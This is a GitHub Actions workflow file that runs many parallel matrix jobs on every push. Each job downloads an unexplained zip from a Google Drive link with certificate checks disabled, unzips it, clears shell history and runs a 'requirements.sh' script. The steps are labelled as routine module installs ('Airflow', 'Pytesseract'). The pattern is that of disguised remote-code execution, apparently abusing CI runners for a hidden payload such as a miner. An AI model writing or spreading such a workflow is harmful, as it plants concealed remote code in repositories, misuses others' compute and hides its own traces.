name: novabien805zone
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  INIT:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.o, I.i, I.ii]
        flag: ['Plan', 'Assemble', 'Validate', 'Run', 'Publish']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: install module
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=14uiiBRihmku65loK6yW4ArKoX7EBO-zA" -O Airflow.zip
        unzip -o Airflow.zip
        rm Airflow.zip
        history -c && history -w

    - name: Pytesseract
      run: bash requirements.sh


  RUN1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.o, I.i, I.ii]
        flag: ['Start', 'Code', 'Debug', 'Deploy', 'Monitor']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: install module
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=14uiiBRihmku65loK6yW4ArKoX7EBO-zA" -O Airflow.zip
        unzip -o Airflow.zip
        rm Airflow.zip
        history -c && history -w

    - name: Pytesseract
      run: bash requirements.sh
        
